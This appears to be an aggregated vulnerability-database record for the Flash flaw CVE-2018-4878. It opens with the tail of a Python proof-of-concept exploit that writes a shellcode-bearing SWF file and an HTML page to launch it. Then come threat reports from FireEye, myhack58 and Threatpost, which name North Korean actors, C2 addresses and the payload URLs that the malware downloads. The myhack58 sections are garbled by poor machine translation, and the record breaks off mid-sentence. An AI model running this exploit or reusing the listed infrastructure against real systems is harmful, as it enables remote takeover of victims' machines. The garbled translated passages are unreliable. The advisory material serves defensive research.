0\\x74\\x6D\\x05\\xF0\\x4C\\x65\\x01\\x6C\\x03\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\x06\\xFF\\xFF\\x65\\x01\\x6C\\x07\\x48\\xF0\\x6F\\x10\\x17\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\x71\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x24\\x00\\x48\\x01\\x46\\x84\\x06\\x8A\\x06\\x3C\\x3D\\x08\\x0D\\x00\\x01\\x01\\x00\\x0E\\x00\\x02\\x01\\x00\\x0F\\x00\\x03\\x01\\x00\\x10\\x00\\x04\\x01\\x00\\x11\\x00\\x05\\x01\\x00\\x12\\x00\\x06\\x01\\x00\\x13\\x00\\x07\\x01\\x00\\x14\\x00\\x08\\x15\\x00\\x03\\x0D\\x0D\\x04\\x05\\x86\\x03\\xD0\\x30\\x24\\x00\\x74\\x63\\x04\\x5D\\x4D\\x46\\x4D\\x00\\x29\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x63\\x05\\xF0\\x7C\\x5D\\x4E\\x5D\\x4E\\x5D\\x4E\\x62\\x05\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x14\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x46\\x4E\\x01\\x5D\\x51\\x66\\x51\\x96\\x96\\x12\\x08\\x00\\x00\\x25\\xBC\\x01\\x82\\x10\\x04\\x00\\x00\\x25\\xB0\\x01\\x82\\xA0\\x74\\x63\\x06\\xF0\\x7D\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x2D\\x04\\x15\\x04\\x00\\x00\\x10\\x0A\\x00\\x00\\xF0\\x7F\\x62\\x06\\x24\\x04\\xA0\\x74\\x63\\x06\\xF0\\x81\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x06\\xF0\\x82\\x01\\x5D\\x4E\\x62\\x06\\x46\\x4E\\x01\\x74\\x63\\x07\\xF0\\x83\\x01\\x5D\\x4E\\x62\\x05\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x74\\x63\\x08\\xF0\\x84\\x01\\x5D\\x4E\\x62\\x05\\x24\\x20\\xA0\\x46\\x4E\\x01\\x74\\x63\\x09\\xF0\\x85\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x25\\x80\\x02\\x42\\x01\\x80\\x5A\\x63\\x0A\\x10\\x24\\x00\\x00\\x09\\xF0\\x88\\x01\\x62\\x0A\\x62\\x04\\x5D\\x4E\\x62\\x07\\x25\\x80\\x01\\xA1\\x62\\x04\\x24\\x04\\xA2\\xA0\\x46\\x4E\\x01\\x61\\x53\\xF0\\x89\\x01\\x62\\x04\\x91\\x74\\x63\\x04\\xF0\\x86\\x01\\x62\\x04\\x25\\x80\\x02\\x0C\\x04\\x00\\x00\\x10\\xCC\\xFF\\xFF\\xF0\\x8B\\x01\\x62\\x0A\\x24\\x20\\x24\\x07\\xA0\\xD1\\x61\\x53\\xF0\\x8C\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\xD2\\x46\\x4F\\x02\\x29\\xF0\\x8D\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\xD3\\x46\\x4F\\x02\\x29\\xF0\\x8E\\x01\\x5D\\x4F\\x62\\x06\\x5D\\x49\\x62\\x0A\\x46\\x49\\x01\\x25\\x80\\x01\\xA0\\x46\\x4F\\x02\\x29\\xF0\\x8F\\x01\\x5D\\x3E\\x24\\x41\\x4A\\x3E\\x01\\x80\\x3E\\x63\\x0B\\xF0\\x90\\x01\\x5D\\x4D\\x66\\x4D\\x66\\x1F\\x20\\x62\\x0B\\x46\\x20\\x02\\x82\\x63\\x0C\\xF0\\x91\\x01\\x5D\\x4F\\x62\\x06\\x62\\x07\\x46\\x4F\\x02\\x29\\xF0\\x92\\x01\\x5D\\x4F\\x62\\x05\\x24\\x1C\\xA0\\x62\\x08\\x46\\x4F\\x02\\x29\\xF0\\x93\\x01\\x5D\\x4F\\x62\\x05\\x24\\x20\\xA0\\x62\\x09\\x46\\x4F\\x02\\x29\\xF0\\x94\\x01\\x47\\x00\\x00\\x04\\x0C\\x03\\x05\\x0A\\x92\\x03\\xD0\\x30\\x57\\x2A\\xD5\\x30\\x65\\x01\\x24\\x00\\x6D\\x02\\xF0\\x98\\x01\\x65\\x01\\x20\\x80\\x3E\\x6D\\x01\\xF0\\x99\\x01\\x65\\x01\\x20\\x80\\x65\\x6D\\x03\\xF0\\x9F\\x01\\x65\\x01\\x5D\\x3F\\x66\\x3F\\x82\\x6D\\x08\\xF0\\xA0\\x01\\x65\\x01\\x20\\x85\\x6D\\x09\\xF0\\xA4\\x01\\xF0\\xA4\\x01\\x65\\x01\\x56\\x00\\x80\\x3E\\x6D\\x01\\xF0\\xA5\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x24\\x00\\x61\\x44\\xF0\\xA6\\x01\\x65\\x01\\x24\\x00\\x73\\x6D\\x02\\x10\\x24\\x00\\x00\\x09\\xF0\\xA7\\x01\\x65\\x01\\x6C\\x01\\x5D\\x42\\x66\\x42\\x66\\x43\\x46\\x45\\x00\\x46\\x25\\x01\\x29\\xF0\\xA6\\x01\\x65\\x01\\x65\\x01\\x6C\\x02\\x24\\x04\\xA0\\x73\\x6D\\x02\\x65\\x01\\x6C\\x02\\x5D\\x42\\x66\\x42\\x66\\x43\\x66\\x46\\x15\\xCC\\xFF\\xFF\\xF0\\xA8\\x01\\x65\\x01\\x5D\\x47\\x66\\x47\\x5D\\x40\\x66\\x40\\x53\\x01\\x64\\x65\\x01\\x6C\\x01\\x41\\x01\\x80\\x66\\x6D\\x03\\xF0\\xAA\\x01\\x65\\x01\\x5D\\x49\\x65\\x01\\x6C\\x03\\x46\\x49\\x01\\x74\\x6D\\x04\\xF0\\xAC\\x01\\x65\\x01\\x5D\\x64\\x46\\x64\\x00\\x74\\x6D\\x05\\xF0\\xAD\\x01\\x65\\x01\\x6C\\x05\\x24\\x00\\x13\\x04\\x00\\x00\\x10\\x0B\\x00\\x00\\xF0\\xAF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\x5D\\x4B\\x65\\x01\\x6C\\x05\\x65\\x01\\x6C\\x04\\x65\\x01\\x6C\\x03\\x66\\x46\\x24\\x04\\xA2\\x46\\x4B\\x03\\x29\\x65\\x01\\x5D\\x4C\\x5D\\x4D\\x66\\x4D\\x46\\x4C\\x01\\x74\\x6D\\x06\\xF0\\xB4\\x01\\x65\\x01\\x5D\\x4E\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x24\\x1C\\xA0\\x46\\x4E\\x01\\x24\\x08\\xA0\\x46\\x4E\\x01\\x24\\x04\\xA0\\x74\\x6D\\x06\\xF0\\xB5\\x01\\x65\\x01\\x5D\\x4E\\x65\\x01\\x6C\\x06\\x46\\x4E\\x01\\x74\\x6D\\x07\\xF0\\xB6\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x04\\x46\\x4F\\x02\\x29\\xF0\\xB8\\x01\\x65\\x01\\x5D\\x4D\\x66\\x4D\\x20\\x5D\\x5F\\x66\\x5F\\x46\\x1F\\x02\\x82\\x6D\\x08\\xF0\\xBA\\x01\\x5D\\x4F\\x65\\x01\\x6C\\x06\\x65\\x01\\x6C\\x07\\x46\\x4F\\x02\\x29\\x47\\x10\\x18\\x00\\x00\\xD0\\x30\\xD1\\x30\\x5A\\x00\\x2A\\xD6\\x2A\\x30\\x2B\\x6D\\x01\\xF0\\xBF\\x01\\x5D\\x3C\\x2C\\x6C\\x4A\\x3C\\x01\\x03\\xF0\\xC2\\x01\\x47\\x01\\x35\\xF2\\x02\\xF6\\x02\\x3C\\x3D\\x09\\x29\\x00\\x01\\x1E\\x00\\x2A\\x00\\x02\\x15\\x00\\x2B\\x00\\x03\\x1A\\x00\\x2C\\x00\\x04\\x01\\x00\\x2D\\x00\\x05\\x01\\x00\\x2E\\x00\\x06\\x01\\x00\\x2F\\x00\\x07\\x01\\x00\\x30\\x00\\x08\\x00\\x00\\x31\\x00\\x09\\x32\\x00\\x05\\x08\\x01\\x05\\x06\\x0E\\xF1\\x05\\xF0\\x0C\\xD0\\x30\\xF0\\x0E\\xD0\\x49\\x00\\xF0\\x0F\\x47\\x00\\x00\\x06\\x09\\x01\\x01\\x04\\x3D\\xD0\\x30\\x10\\x05\\x00\\x00\\x41\\x05\\x03\\x58\\x04\\xF1\\x05\\xF0\\x07\\x5D\\x36\\x5D\\x37\\x66\\x37\\x10\\x04\\x00\\x00\\x16\\x1F\\x00\\x00\\x30\\x5D\\x35\\x66\\x35\\x30\\x5D\\x35\\x66\\x35\\x58\\x00\\x1D\\x26\\x11\\x06\\x00\\x00\\x47\\x70\\x45\\x0A\\x10\\xD5\\x1D\\x68\\x34\\xF1\\x05\\xF0\\x05\\x47\\x00\\x00\\x1C\\x13\\x02\\x00\\x02\\x00\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x42\\x79\\x74\\x65\\x73\\x00\\x00\\x00\\x4D\\x61\\x69\\x6E\\x45\\x78\\x70\\x00\\x40\\x00\\x00\\x00\"\r\n\r\nswf = \"%s.swf\" % flash_name\r\n\r\nhtml = \"\"\"\r\n<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n\t<meta charset=\"utf-8\"/>\r\n\t<title>CVE-2018-4878 Exploit</title>\r\n\t<meta name=\"description\" content=\"\" />\r\n\t<style>\r\n\t\thtml, body { height:100%; overflow:hidden; }\r\n\t\tbody { margin:0; }\r\n\t</style>\r\n</head>\r\n<body>\r\n\t<div id=\"altContent\">\r\n\t\t<h1>CVE-2018-4878(Flash Exploit)</h1>\r\n\t\t<p><a href=\"http://py4.me/blog/\">Test By RedFree</a></p>\r\n\t</div>\r\n\t\"\"\" + \"<embed src=\\\"\" + swf + \"\\\"></embed>\" + \"\"\"\r\n</body>\r\n</html>\r\n\"\"\"\r\n\r\nf = open(\"/Users/RedFree/Downloads/%s\" % swf, \"wb\")\r\nf.write(data)\r\nf.close()\r\n\r\nf = open(\"/Users/RedFree/Downloads/index.html\", \"wb\")\r\nf.write(html)\r\nf.close()\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-97136", "cvss": {"score": 0.0, "vector": "NONE"}}], "fireeye": [{"lastseen": "2018-08-31T00:18:22", "bulletinFamily": "info", "cvelist": ["CVE-2018-4878"], "description": "On Jan. 31, KISA (KrCERT) published an [advisory about an Adobe Flash zero-day vulnerability](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>) (CVE-2018-4878) being exploited in the wild. On Feb. 1, Adobe issued an advisory confirming the [vulnerability exists in Adobe Flash Player 28.0.0.137 and earlier](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) versions, and that successful exploitation could potentially allow an attacker to take control of the affected system.\n\nFireEye began investigating the vulnerability following the release of the initial advisory from KISA.\n\n#### Threat Attribution\n\nWe assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper. We have observed TEMP.Reaper operators directly interacting with their command and control infrastructure from IP addresses assigned to the STAR-KP network in Pyongyang. The STAR-KP network is operated as a joint venture between the North Korean Government's Post and Telecommunications Corporation and Thailand-based Loxley Pacific. Historically, the majority of their targeting has been focused on the South Korean government, military, and defense industrial base; however, they have expanded to other international targets in the last year. They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors.\n\nIn the past year, FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper, which we detect as RUHAPPY. While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks, we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets.\n\n#### Attack Scenario\n\nAnalysis of the exploit chain is ongoing, but available information points to the Flash zero-day being distributed in a malicious document or spreadsheet with an embedded SWF file. Upon opening and successful exploitation, a decryption key for an encrypted embedded payload would be downloaded from compromised third party websites hosted in South Korea. Preliminary analysis indicates that the vulnerability was likely used to distribute the previously observed DOGCALL malware to South Korean victims.\n\n#### Recommendations\n\nAdobe stated that it plans to release a fix for this issue the week of Feb. 5, 2018. Until then, we recommended that customers use extreme caution, especially when visiting South Korean sites, and avoid opening suspicious documents, especially Excel spreadsheets. Due to the publication of the vulnerability prior to patch availability, it is likely that additional criminal and nation state groups will attempt to exploit the vulnerability in the near term.\n\n#### FireEye Solutions Detections\n\nFireEye Email Security, Endpoint Security with Exploit Guard enabled, and Network Security products will detect the malicious document natively. Email Security and Network Security customers who have enabled the riskware feature may see additional alerts based on suspicious content embedded in malicious documents. Customers can find more information in our [FireEye Customer Communities post](<https://community.fireeye.com/docs/DOC-7041>).\n", "modified": "2018-02-02T21:15:00", "published": "2018-02-02T21:15:00", "id": "FIREEYE:0D4F2E1284C786ABA6A50D8BE7E34E6E", "href": "https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html", "type": "fireeye", "title": "Attacks Leveraging Adobe Zero-Day (CVE-2018-4878) \u2013 Threat Attribution, Attack Scenario and Recommendations", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-11T12:50:32", "bulletinFamily": "info", "cvelist": ["CVE-2018-4878", "CVE-2018-0802"], "description": "On Feb. 2, 2018, we published a [blog detailing the use of an Adobe Flash zero-day vulnerability](<https://www.fireeye.com/blog/threat-research/2018/02/attacks-leveraging-adobe-zero-day.html>) (CVE-2018-4878) by a suspected North Korean cyber espionage group that we now track as APT37 (Reaper).\n\nOur analysis of APT37\u2019s recent activity reveals that the group\u2019s operations are expanding in scope and sophistication, with a toolset that includes access to zero-day vulnerabilities and wiper malware. We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests. FireEye iSIGHT Intelligence believes that APT37 is aligned with the activity publicly reported as [Scarcruft](<https://cdn.securelist.com/files/2017/10/Guerrero-Saade-Raiu-VB2017.pdf>) and [Group123](<http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html>).\n\nRead our report, _[APT37 (Reaper): The Overlooked North Korean Actor](<https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf>)_, to learn more about our assessment that this threat actor is working on behalf of the North Korean government, as well as various other details about their operations:\n\n * **Targeting:** Primarily South Korea \u2013 though also Japan, Vietnam and the Middle East \u2013 in various industry verticals, including chemicals, electronics, manufacturing, aerospace, automotive, and healthcare.\n * **Initial Infection Tactics:** Social engineering tactics tailored specifically to desired targets, strategic web compromises typical of targeted cyber espionage operations, and the use of torrent file-sharing sites to distribute malware more indiscriminately.\n * **Exploited Vulnerabilities:** Frequent exploitation of vulnerabilities in Hangul Word Processor (HWP), as well as Adobe Flash. The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802), and the ability to incorporate them into operations.\n * **Command and Control Infrastructure:** Compromised servers, messaging platforms, and cloud service providers to avoid detection. The group has shown increasing sophistication by improving their operational security over time.\n * **Malware:** A diverse suite of malware for initial intrusion and exfiltration. Along with custom malware used for espionage purposes, APT37 also has access to destructive malware.\n\nMore information on this threat actor is found in our report, _[APT37 (Reaper): The Overlooked North Korean Actor](<https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf>)_. You can also [register for our upcoming webinar](<https://www2.fireeye.com/WBNR-APT37-Overlooked-North-Korean-Threat.html>) for additional insights into this group.\n", "modified": "2018-02-20T08:30:00", "published": "2018-02-20T08:30:00", "id": "FIREEYE:96525D6EA5DBF734A371FB66EB02FA45", "href": "https://www.fireeye.com/blog/threat-research/2018/02/apt37-overlooked-north-korean-actor.html", "type": "fireeye", "title": "APT37 (Reaper): The Overlooked North Korean Actor", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "myhack58": [{"lastseen": "2018-04-10T16:18:56", "bulletinFamily": "info", "cvelist": ["CVE-2018-4878"], "description": "! [](/Article/UploadPic/2018-4/2018410185227201. jpg? www. myhack58. com) \nEarlier, a researchers found that a Hong Kong Telecommunications Company website hacking attack, 3 May 21, Morphisec laboratory on the site of attack to carry out the investigation, investigators eventually found that the telecommunications company of the Group's official website was hacked, the home page home. php is embedded with a Flash exploit CVE-2018-4878 exploit file. \nAttack overview \nThe attack was an example of a textbook targeted\u201cwatering hole attack\u201d, the attacker through the target victims may access on the website of the implant malicious software or code, to induce the victim system to be infected, giving an attacker the open portal, this attack used in cyber espionage on. Morphisec survey found that the watering hole attack with a very high level of[free to kill](<http://www.myhack58.com/Soft/html/12/24/Soft_024_1.htm>)escape features: attack is completely without documents, in the victim on the disk does not leave any persistent or can be traced back traces, also in a non-filtered port using a custom Protocol. Generally speaking, this advanced type of watering hole attack is extremely targeted, and also has a very sophisticated attacker background. \nWhen the CVE-2018-4878 vulnerability code was disclosed after the global range occurs within a multi-national support hacker attacks, malicious software attacks and exploit kits diffusion utilization, the watering hole attack is also regarded as the use of CVE-2018-4878 vulnerability a recent assault case. Currently, the Morphisec analysis report, the Hong Kong Telecommunications Company website, the malicious code has been cleared, site security situation to return to normal. \nAttack analysis \nBe the attackers embed exploits files Flash Virus the home. php main page: \n! [](/Article/UploadPic/2018-4/2018410185228639. jpg? www. myhack58. com) \nThis is an embedded Flash exploit with the previous universal CVE-2018-4878 exploit programs are very similar, but differs in that it is a use-type post-exploitation the program: \n! [](/Article/UploadPic/2018-4/2018410185228777. png? www. myhack58. com) \nIts shellcode will perform Windows System in effective rundll32. exe process, by injecting the process, use it to hide malicious code from running in memory space, and then, the shellcode will download the other follow-up use of code injection to the rundll32 process: \n! [](/Article/UploadPic/2018-4/2018410185229606. png? www. myhack58. com) \n! [](/Article/UploadPic/2018-4/2018410185229608. png? www. myhack58. com) \nThe attacker uses the C2 server is the 106[.] 185.24.241 Japan, it is in the victim host communications, use the 443 port for the custom Protocol, at present, Morphisec being on the Protocol for an in-depth analysis: \n! [](/Article/UploadPic/2018-4/2018410185229504. png? www. myhack58. com) \nAttacks using the Metasploit module \nshellcode download injected into the rundll32 process space of the subsequent use of the code including the Metasploit Meterpreter and Mimikatz module, from the time point of view, these modules are in the attack the previous week, which is 2 on 15 May to be compiled: \n! [](/Article/UploadPic/2018-4/2018410185229378. png? www. myhack58. com) \nFollowing the yellow module is the original Metasploit exploit module: \n! [](/Article/UploadPic/2018-4/2018410185229133. png? www. myhack58. com) \nSummary \nThrough the investigation, Morphisec found that the complexity of the watering hole attack is that the attacker plans to conduct in-depth attack of the prelude, may have very high complexity of the attacker's background. Morphisec claimed that, since the attack uses the CVE-2018-4878 the use of the program, and prior to be found for countries hacking related attacks were highly similar, where there may be some Association. Currently, Morphisec also unlocated traced back to a specific attacker, they will continue to follow up investigation. \nAttack feature \nFlash \u2013 58D15B7A49193022D8FB9712FAC1A9E2 \nC2 - 106[.] 185.24.241 (li715-241. members. linode[.] com:https) \n\n", "edition": 1, "modified": "2018-04-10T00:00:00", "published": "2018-04-10T00:00:00", "id": "MYHACK58:62201889929", "href": "http://www.myhack58.com/Article/html/3/62/2018/89929.htm", "type": "myhack58", "title": "CVE-2018-4878 case: for a Hong Kong Telecommunications Company website is intrusion investigations-vulnerability and early warning-the black bar safety net", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-07T13:58:25", "bulletinFamily": "info", "cvelist": ["CVE-2018-8174", "CVE-2018-4878"], "description": "! [](/Article/UploadPic/2018-8/2018871743799. jpg? www. myhack58. com) \nWrite in front of words \nRecently we found a to attempt to exploit CVE-2018-4878 Flash Player vulnerability, vulnerability to attack, its sequence and we currently find any loopholes to use the tool are not the same. After investigation, we found that this is a Chinese security company qihoo 360 in by the end of 2017 the reference to the existing developed part of the framework. But at the time the payload seems to be a promotion of the adware Trojan. And this time, use of the payload it is not a standard PE file. On the contrary, it is more like a multi-stage executable format, and it also acts as a download loader, is used to retrieve hidden Bee miner botnet using the LUA script. This may be the first used mining Crypto-currencies of the bootkit case. \nAdvertising overview \nThe attacker is using the adult site of the temptation of advertising will be the victim attracted to the phishing page. We believe that this series of ads is mainly for Asian countries, the region of the user, according to the ads and our known data. This claim is can be online Dating services of the server that contains a malicious iframe, which is mainly responsible for the development and infected users. \n! [](/Article/UploadPic/2018-8/2018871743829. png? www. myhack58. com) \n! [](/Article/UploadPic/2018-8/2018871743182. png? www. myhack58. com) \nIE exploit \nHere, the malicious code from having embedded encryption block of the web page begins execution. And the use of Base64 encoding and then RC4 or Rabbit two algorithms, one for encryption: \n! [](/Article/UploadPic/2018-8/2018871743257. png? www. myhack58. com) \nAfter decryption, the block will be executed. Here you can find a running Java Script the decoded version. We may be in the script to see, it will generate a random session key, then use the attacker's public RSA key to encrypt to: \n! [](/Article/UploadPic/2018-8/2018871743598. png? www. myhack58. com) \nThe encrypted key will be passed to the next function and converted to JSON format, to a hard-coded URL to perform the POST request: \n! [](/Article/UploadPic/2018-8/2018871743101. png? www. myhack58. com) \nIf we view the client and the server traffic between the client sends the encrypted\u201ckey\u201d, the server response\u201cvalue\u201d, we more clearly find this: \n! [](/Article/UploadPic/2018-8/2018871743454. png? www. myhack58. com) \nServer-side \n1. The attacker of using a private RSA key encryption, the server passes the decryption of the session key. \n2. Select a symmetric algorithm(Rabbit or RC4)encryption vulnerability payload in. \n3. The encrypted content is returned to the client. Since the client in memory still has the key to the unencrypted version, so it can decrypt and execute the vulnerability. However, only from the communication flow can not retrieve the original session key, it is impossible to reproduce the vulnerability. But fortunately, we in the dynamic analysis in the successful capture of a vulnerability. And we found the attacker exploited a vulnerability is CVE-2018-8174 to. \nFlash exploit \nThis is a relatively new Flash Vulnerability, CVE-2018-4878 use the program,in the odd Tiger 360 released document when it is not their exploit kits are part of, may be in order to enhance its performance later add. The vulnerability is in the embedded shell code is just the next stage of the download procedure. Successfully exploited, it will be in the following URL to retrieve the payload: \n! [](/Article/UploadPic/2018-8/2018871744139. png? www. myhack58. com) \nThis extension. wasm file forged into a Web Assembler module. But in fact, it is something completely different. \nAs you can see, it loads for decompressing cabinet file Cabinet. dll module. In a later section, we saw used by the HTTP Protocol to communicate with API and string. We also found that the\u201cdllhost.exe\u201dand\u201cbin/i386/core. sdb\u201dreferences. \n! [](/Article/UploadPic/2018-8/2018871744180. png? www. myhack58. com) \nWe are very easy to guess this module will download and use the dllhost. exe to run. And another string the Base64-encoded content: \n! [](/Article/UploadPic/2018-8/2018871744342. png? www. myhack58. com) \nWhich after decoding of the content to show more of the URL: \nhttp://103.35.72.223/git/wiki.asp?id=530475f52527a9ae1813d529653e9501 \nhttp://103.35.72.223/git/glfw.wasm \nhttp://103.35.72.223/rt/lsv3i06rrmcu491c3tv82uf228.wasm \nLook at the Fiddler capture of the traffic, we found that the module is indeed in the query these URL: \n! [](/Article/UploadPic/2018-8/2018871744460. png? www. myhack58. com) \n\u8bf7\u6c42\u6765\u81eadllhost.exe this may mean that the above executable files have been injected malicious code. File glfw. wasm with the Web Assembly between The have nothing in common. In fact, it is a Cabinet file that contains the internal path of the package content: bin/i386/core. sdb. Seen from inside, we find the same custom executable format, such as DLL names: \n! [](/Article/UploadPic/2018-8/2018871744279. png? www. myhack58. com)\n\n**[1] [[2]](<91130_2.htm>) [next](<91130_2.htm>)**\n", "edition": 1, "modified": "2018-08-07T00:00:00", "published": "2018-08-07T00:00:00", "id": "MYHACK58:62201891130", "href": "http://www.myhack58.com/Article/html/3/62/2018/91130.htm", "title": "To see the Hidden Bee how to use a new vulnerability propagation-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2019-03-14T05:46:49", "bulletinFamily": "info", "cvelist": ["CVE-2018-4871", "CVE-2018-4878", "CVE-2019-0797"], "description": "The South Korean Computer Emergency Response Team issued a warning Wednesday of a new Adobe Flash Player zero-day spotted in the wild. The security bulletin warns that the attacks are focused on South Koreans and involve malicious Microsoft Word documents.\n\nAccording to the South Korean Computer Emergency Response Team (KR-CERT), the zero-day is believed to be a Flash SWF file embedded in MS Word documents. Impacted is Adobe\u2019s most recent Flash Player 28.0.0.137 and earlier.\n\n\u201cAn attacker may be able to convince a user to open a Microsoft Office document, web page, or spam mail containing a Flash file,\u201d according to a machine translation [of the KR-CERT security bulletin](<https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998>).\n\nAdobe released a security advisory on Thursday acknowledging the vulnerability and attacks.\n\n> \u201cAdobe is aware of a report that an exploit for [CVE-2018-4878](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>) exists in the wild, and is being used in limited, targeted attacks against Windows users. Adobe will address this vulnerability in a release planned for the week of February 5,\u201d according the advisory.\n\nAdobe said the zero-day is exploiting the vulnerability CVE-2018-4878, a critical remote code execution bug. According to Adobe it was discovered in Adobe Flash Player before 28.0.0.137. Adobe credits KR-CERT for reporting this issue.\n\nAdobe said affected products are versions of Adobe Flash Player Desktop Runtime (Win/Mac), Adobe Flash Player for Google Chrome (Win/Mac/Linux/Chrome OS), Adobe Flash Player for Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1) and Adobe Flash Player Desktop Runtime (Linux). A complete list is [available here](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>).\n\nSimon Choi, a security researcher with the South Korean security firm Hauri, claimed on Twitter that the zero-day vulnerability originated in North Korea and has been in use since mid-November 2017. Targeted are South Koreans researching online for information about North Korea.\n\n> Flash 0day vulnerability that made by North Korea used from mid-November 2017. They attacked South Koreans who mainly do research on North Korea. (no patch yet) [pic.twitter.com/bbjg1CKmHh](<https://t.co/bbjg1CKmHh>)\n> \n> \u2014 Simon Choi (@issuemakerslab) [February 1, 2018](<https://twitter.com/issuemakerslab/status/959006385550778369?ref_src=twsrc%5Etfw>)\n\nKR-CERT is recommending users refrain from using Microsoft\u2019s Internet Explorer browser and use Mozilla\u2019s Firefox browser instead.\n\nOn Thursday Adobe recommended:\n\n> \u201cBeginning with Flash Player 27, administrators have the ability to change Flash Player\u2019s behavior when running on Internet Explorer on Windows 7 and below by prompting the user before playing SWF content. For more details, see this administration guide. Administrators may also consider implementing Protected View for Office. Protected View opens a file marked as potentially unsafe in Read-only mode,\u201d Adobe said.\n", "modified": "2018-02-01T15:40:55", "published": "2018-02-01T15:40:55", "id": "THREATPOST:E1C629434DE943EAA7BD57B1F6EEA7E2", "href": "https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/", "type": "threatpost", "title": "Adobe Flash Player Zero-Day Spotted in the Wild", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-01-23T05:27:42", "bulletinFamily": "info", "cvelist": ["CVE-2018-4878"], "description": "Cybercriminals are leveraging a recently patched critical Adobe Flash Player vulnerability in a massive spam campaign targeting unpatched computers.\n\nAccording to cybersecurity firm Morphisec, cybercriminals are blasting spam messages that urge recipients to click a link to download a Word document. And when a victim opens the document and enables macros, malware attempts to exploit an Adobe Flash Player bug [(CVE-2018-4878](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>)) patched by Adobe [earlier this month.](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) Victims who fall for the ploy could ultimately hand over control of their systems to an attacker, according to researchers.\n\nAdobe classified the [bug as critical](<https://helpx.adobe.com/security/products/flash-player/apsa18-01.html>), describing it as a use-after-free vulnerability impacting its Adobe Flash Player running on Windows 10, macOS, Linux and Chrome OS systems. The flaw was originally found by the South Korean Computer Emergency Response Team [on Jan. 31](<https://threatpost.com/adobe-flash-player-zero-day-spotted-in-the-wild/129742/>) and identified as a Flash SWF file embedded in Microsoft Word and Excel documents.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/02/06221417/Adobe_Vuln_Spam_CVE-2018-4878-in-the-wild.png>)\n\nMichael Gorelik, chief technology officer and vice president of Research and Development at Morphisec, said that as part of the recent spam campaign victims were sent emails with short links to the malicious Word documents for download. He added, the malicious attachments were able to, for the most part, circumvent AV protection \u2013 showing a low detection ratio on VirusTotal.\n\n\u201cAfter downloading and opening the Word document, the attack exploits the Flash vulnerability 2018-4878 and opens a (command prompt) which is later remotely injected with a malicious shellcode that connects back to a malicious (C2) domain,\u201d Gorelik wrote in a technical write-up [outlining the attacks](<https://blog.morphisec.com/flash-exploit-cve-2018-4878-spotted-in-the-wild-massive-malspam-campaign>). \u201cThe next step, the shellcode downloads a \u2018m.db\u2019 dll from the same domain, which is executed using regsvr32 process in order to be able to bypass whitelisting solutions.\u201d\n\nA regsvr32 (Microsoft Register Server) process is a command-line utility that is part of the Windows OS and is used for registering and unregistering DLLs and ActiveX controls within the context of the Windows Registry.\n\nResearchers said the analytics for the short links used in the email spam campaign shows the same pattern as a legitimate email campaigns, making them hard to detect. \u201cClickthroughs spike in the first couple of hours after emails are sent. Signature-based defenses, like antiviruses, cannot cope with this pace,\u201d Gorelik wrote.\n\nThe campaign tracked by Morphisec was \u201cjust a few hours long\u201d and targeted inboxes in the U.S. and Europe. \u201cThe documents were downloaded from the safe-storge[.]biz domain and went almost entirely undetected with an 1/67 detection ratio,\u201d according to 